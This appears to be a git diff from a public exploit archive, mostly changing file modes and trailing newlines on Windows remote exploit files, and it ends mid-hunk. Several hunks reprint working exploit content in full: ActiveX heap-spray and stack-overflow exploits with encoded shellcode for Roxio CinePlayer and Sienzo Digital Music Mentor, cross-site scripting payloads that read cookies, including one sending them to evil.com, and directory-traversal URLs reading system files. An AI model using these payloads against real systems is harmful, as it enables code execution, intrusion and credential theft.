100644 diff --git a/platforms/windows/remote/27611.txt b/platforms/windows/remote/27611.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27627.txt b/platforms/windows/remote/27627.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27703.py b/platforms/windows/remote/27703.py index 586f625f7..05a4f9353 100755 --- a/platforms/windows/remote/27703.py +++ b/platforms/windows/remote/27703.py @@ -80,4 +80,4 @@ try: print "[-] Connection lost from " + target + ":28876 \r" except: print "[-] Could not connect to " + target + ":21\r" - sys.exit(0) \ No newline at end of file + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/remote/27744.html b/platforms/windows/remote/27744.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27746.txt b/platforms/windows/remote/27746.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27754.txt b/platforms/windows/remote/27754.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27758.txt b/platforms/windows/remote/27758.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27759.txt b/platforms/windows/remote/27759.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27760.txt b/platforms/windows/remote/27760.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27806.txt b/platforms/windows/remote/27806.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27820.txt b/platforms/windows/remote/27820.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2785.c b/platforms/windows/remote/2785.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27851.bat b/platforms/windows/remote/27851.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2789.cpp b/platforms/windows/remote/2789.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27943.txt b/platforms/windows/remote/27943.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27984.txt b/platforms/windows/remote/27984.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27986.html b/platforms/windows/remote/27986.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28.c b/platforms/windows/remote/28.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2800.cpp b/platforms/windows/remote/2800.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28005.pl b/platforms/windows/remote/28005.pl index ade263ac7..6c155fdd5 100755 --- a/platforms/windows/remote/28005.pl +++ b/platforms/windows/remote/28005.pl @@ -60,4 +60,4 @@ $smtp->quit() ; -print "$cont\n\ndone\n"; \ No newline at end of file +print "$cont\n\ndone\n"; \ No newline at end of file diff --git a/platforms/windows/remote/28007.txt b/platforms/windows/remote/28007.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28118.html b/platforms/windows/remote/28118.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28186.c b/platforms/windows/remote/28186.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28189.txt b/platforms/windows/remote/28189.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2821.c b/platforms/windows/remote/2821.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28224.c b/platforms/windows/remote/28224.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28225.c b/platforms/windows/remote/28225.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28226.c b/platforms/windows/remote/28226.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28235.c b/platforms/windows/remote/28235.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28284.html b/platforms/windows/remote/28284.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28298.txt b/platforms/windows/remote/28298.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28331.txt b/platforms/windows/remote/28331.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28357.asc b/platforms/windows/remote/28357.asc old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28360.c b/platforms/windows/remote/28360.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28373.txt b/platforms/windows/remote/28373.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28374.txt b/platforms/windows/remote/28374.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28376.html b/platforms/windows/remote/28376.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28400.html b/platforms/windows/remote/28400.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28438.html b/platforms/windows/remote/28438.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28489.txt b/platforms/windows/remote/28489.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28500.txt b/platforms/windows/remote/28500.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28512.txt b/platforms/windows/remote/28512.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28640.txt b/platforms/windows/remote/28640.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28641.txt b/platforms/windows/remote/28641.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28642.txt b/platforms/windows/remote/28642.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2866.html b/platforms/windows/remote/2866.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28765.c b/platforms/windows/remote/28765.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28849.txt b/platforms/windows/remote/28849.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28850.txt b/platforms/windows/remote/28850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28853.html b/platforms/windows/remote/28853.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28876.htm b/platforms/windows/remote/28876.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28877.htm b/platforms/windows/remote/28877.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28884.html b/platforms/windows/remote/28884.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/28968.html b/platforms/windows/remote/28968.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29032.txt b/platforms/windows/remote/29032.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29045.txt b/platforms/windows/remote/29045.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29083.txt b/platforms/windows/remote/29083.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29146.c b/platforms/windows/remote/29146.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29171.txt b/platforms/windows/remote/29171.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29277.txt b/platforms/windows/remote/29277.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29281.txt b/platforms/windows/remote/29281.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/293.c b/platforms/windows/remote/293.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29490.txt b/platforms/windows/remote/29490.txt old mode 100755 new mode 100644 index cdf1c2fe9..4772fb7d3 --- a/platforms/windows/remote/29490.txt +++ b/platforms/windows/remote/29490.txt @@ -4,4 +4,4 @@ The AVM Fritz!DSL IGD Control Service is prone to a remote information-disclosur Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with SYSTEM-level privileges. Information harvested may aid in further attacks. -http://www.example.com:49001/..%5C..%5C..%5Cwindows%5Csystem.ini \ No newline at end of file +http://www.example.com:49001/..%5C..%5C..%5Cwindows%5Csystem.ini \ No newline at end of file diff --git a/platforms/windows/remote/295.c b/platforms/windows/remote/295.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29524.txt b/platforms/windows/remote/29524.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29538.c b/platforms/windows/remote/29538.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29575.txt b/platforms/windows/remote/29575.txt old mode 100755 new mode 100644 index 1b89f8cfa..d1efb7926 --- a/platforms/windows/remote/29575.txt +++ b/platforms/windows/remote/29575.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to access sensitive information that Version 0.0.7 is vulnerable; other versions may also be affected. -http://www.example.com/../../../../[file] \ No newline at end of file +http://www.example.com/../../../../[file] \ No newline at end of file diff --git a/platforms/windows/remote/29619.html b/platforms/windows/remote/29619.html old mode 100755 new mode 100644 index a908357f0..098c5b344 --- a/platforms/windows/remote/29619.html +++ b/platforms/windows/remote/29619.html @@ -54,4 +54,4 @@ onerror="alert('loading image error')"> - Script Tag Local File Access: -<script src="file:///C:/example.js"></script> \ No newline at end of file +<script src="file:///C:/example.js"></script> \ No newline at end of file diff --git a/platforms/windows/remote/29685.txt b/platforms/windows/remote/29685.txt old mode 100755 new mode 100644 index 1c2ca6229..d56dad12b --- a/platforms/windows/remote/29685.txt +++ b/platforms/windows/remote/29685.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would run in the context of the affected This issue affects SHOUTcast 1.9.7 for Microsoft Windows; other versions may also be vulnerable. -http://www.example.com/"/><script>alert(document.getElementsByTagName("PRE")[0].firstChild.data)</script> \ No newline at end of file +http://www.example.com/"/><script>alert(document.getElementsByTagName("PRE")[0].firstChild.data)</script> \ No newline at end of file diff --git a/platforms/windows/remote/29686.txt b/platforms/windows/remote/29686.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29687.py b/platforms/windows/remote/29687.py index b2a9f8d55..40139cb42 100755 --- a/platforms/windows/remote/29687.py +++ b/platforms/windows/remote/29687.py @@ -57,6 +57,4 @@ else: test=test+1; - print "\n\n\t\t\t[ c0ded by PeTrO ]" - - \ No newline at end of file + print "\n\n\t\t\t[ c0ded by PeTrO ]" \ No newline at end of file diff --git a/platforms/windows/remote/29688.txt b/platforms/windows/remote/29688.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/297.c b/platforms/windows/remote/297.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29741.txt b/platforms/windows/remote/29741.txt old mode 100755 new mode 100644 index 3de9e4d4f..7665d4ca0 --- a/platforms/windows/remote/29741.txt +++ b/platforms/windows/remote/29741.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a cross-site scripting vulnerability bec An attacker can exploit this issue to spoof the contents of the Navigation canceled page, steal cookie-based authentication credentials, and obtain other sensitive information. Successful exploits may assist in phishing or other attacks that rely on content spoofing. -res://ieframe.dll/navcancl.htm#http://www.example.com/[script] \ No newline at end of file +res://ieframe.dll/navcancl.htm#http://www.example.com/[script] \ No newline at end of file diff --git a/platforms/windows/remote/29771.txt b/platforms/windows/remote/29771.txt old mode 100755 new mode 100644 index 3a066f2f6..73f0879e9 --- a/platforms/windows/remote/29771.txt +++ b/platforms/windows/remote/29771.txt @@ -6,4 +6,4 @@ An attackers may exploit this issue to execute local files. The attacker must en The vendor reports this issue can also be exploited through use of UNC navigation to execute arbitrary remote code. This may facilitate a remote compromise of the affected computer. -Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a> \ No newline at end of file +Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a> \ No newline at end of file diff --git a/platforms/windows/remote/29814.txt b/platforms/windows/remote/29814.txt old mode 100755 new mode 100644 index 560926b86..d8cd4baff --- a/platforms/windows/remote/29814.txt +++ b/platforms/windows/remote/29814.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Version 2.02 is vulnerable; other versions may also be affected. -http://www.example.com/lpext.dll?f=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/lpext.dll?f=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/remote/29840.html b/platforms/windows/remote/29840.html old mode 100755 new mode 100644 index 518bc3508..ae0d260fe --- a/platforms/windows/remote/29840.html +++ b/platforms/windows/remote/29840.html @@ -8,4 +8,4 @@ Exploiting this issue allows the attacker to execute arbitrary code in the conte Roxio CinePlayer 3.2 is vulnerable; other versions may also be affected. -<html> <head> <title>Roxio CinePlayer 3.2 (SonicMediaPlayer.dll) Remote BOF Exploit</title> <br>Roxio CinePlayer 3.2 (SonicMediaPlayer.dll) Remote BOF Exploit</br> <br>Advisory from secunia 22251</br> <br>By : Super-cristal</br> <br>Greetings: His0k4, snakespc.com</br> <br>Tested on Windows Xp Sp2 (en),with IE7</br> <object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='test'></object> <script language='javascript'> shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); nops=unescape('%u0c0c%u0c0c'); headersize =20; slackspace= headersize + shellcode.length; while( nops.length< slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<262144) block= block+ block+ fillblock; memory=new Array(); for( counter=0; counter<500; counter++) memory[ counter]= block+ shellcode; buffer=''; for( counter=0; counter<=200; counter++) buffer+=unescape('%0c%0c%0c%0c'); test.DiskType( buffer); </script> </head> </html> \ No newline at end of file +<html> <head> <title>Roxio CinePlayer 3.2 (SonicMediaPlayer.dll) Remote BOF Exploit</title> <br>Roxio CinePlayer 3.2 (SonicMediaPlayer.dll) Remote BOF Exploit</br> <br>Advisory from secunia 22251</br> <br>By : Super-cristal</br> <br>Greetings: His0k4, snakespc.com</br> <br>Tested on Windows Xp Sp2 (en),with IE7</br> <object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='test'></object> <script language='javascript'> shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); nops=unescape('%u0c0c%u0c0c'); headersize =20; slackspace= headersize + shellcode.length; while( nops.length< slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<262144) block= block+ block+ fillblock; memory=new Array(); for( counter=0; counter<500; counter++) memory[ counter]= block+ shellcode; buffer=''; for( counter=0; counter<=200; counter++) buffer+=unescape('%0c%0c%0c%0c'); test.DiskType( buffer); </script> </head> </html> \ No newline at end of file diff --git a/platforms/windows/remote/29843.txt b/platforms/windows/remote/29843.txt old mode 100755 new mode 100644 index 2e1cec74f..5d53d4d14 --- a/platforms/windows/remote/29843.txt +++ b/platforms/windows/remote/29843.txt @@ -8,4 +8,4 @@ This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable. http://www.example.com:8080/console?resource=../../../boot.ini http://www.example.com:8080/console?resource=\boot.ini -http://www.example.com:8080/console?resource=c:\boot.ini \ No newline at end of file +http://www.example.com:8080/console?resource=c:\boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/29897.txt b/platforms/windows/remote/29897.txt old mode 100755 new mode 100644 index 51159230c..09d898690 --- a/platforms/windows/remote/29897.txt +++ b/platforms/windows/remote/29897.txt @@ -9,4 +9,4 @@ WebSpeed 3.1a, 3.1d, and 3.1e are vulnerable; other versions may also be affecte NOTE: Further reports suggest that this issue affects only the 'Development Mode' of the application. This mode is not intended to be used in production systems. This issue is also present when the 'tty' directory is installed. http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fil -eName=C:/root.txt&action=last&section=1&txt0=Test \ No newline at end of file +eName=C:/root.txt&action=last&section=1&txt0=Test \ No newline at end of file diff --git a/platforms/windows/remote/29951.txt b/platforms/windows/remote/29951.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/29952.html b/platforms/windows/remote/29952.html old mode 100755 new mode 100644 index 47a6687ef..93626091c --- a/platforms/windows/remote/29952.html +++ b/platforms/windows/remote/29952.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code in the context of a Digital Music Mentor 2.6.0.4 is vulnerable; other versions may also be affected. -<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre> \ No newline at end of file +<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre> \ No newline at end of file diff --git a/platforms/windows/remote/29964.rb b/platforms/windows/remote/29964.rb index 27123a069..0cd99fa99 100755 --- a/platforms/windows/remote/29964.rb +++ b/platforms/windows/remote/29964.rb @@ -90,4 +90,4 @@ class Exploits::Windows::Antivirus::Trendmicro_Serverprotect_Createbinding < Msf end end -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/remote/30016.txt b/platforms/windows/remote/30016.txt old mode 100755 new mode 100644 index 651029be6..deb15844d --- a/platforms/windows/remote/30016.txt +++ b/platforms/windows/remote/30016.txt @@ -4,4 +4,4 @@ RoboHelp is prone to a cross-site scripting vulnerability because the applicatio An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/project_name/en/frameset-7.html#http://evil.com/cookiethief \ No newline at end of file +http://www.example.com/project_name/en/frameset-7.html#http://evil.com/cookiethief \ No newline at end of file diff --git a/platforms/windows/remote/30019.c b/platforms/windows/remote/30019.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/30026.txt b/platforms/windows/remote/30026.txt old mode 100755 new mode 100644 index 43e46a447..cb7b0498a --- a/platforms/windows/remote/30026.txt +++ b/platforms/windows/remote/30026.txt @@ -13,4 +13,4 @@ TFTP Server TFTPDWIN 0.4.2 is vulnerable; other versions may also be affected. ../../../../../boot.ini ../../../../../../boot.ini ../../../../../../../boot.ini 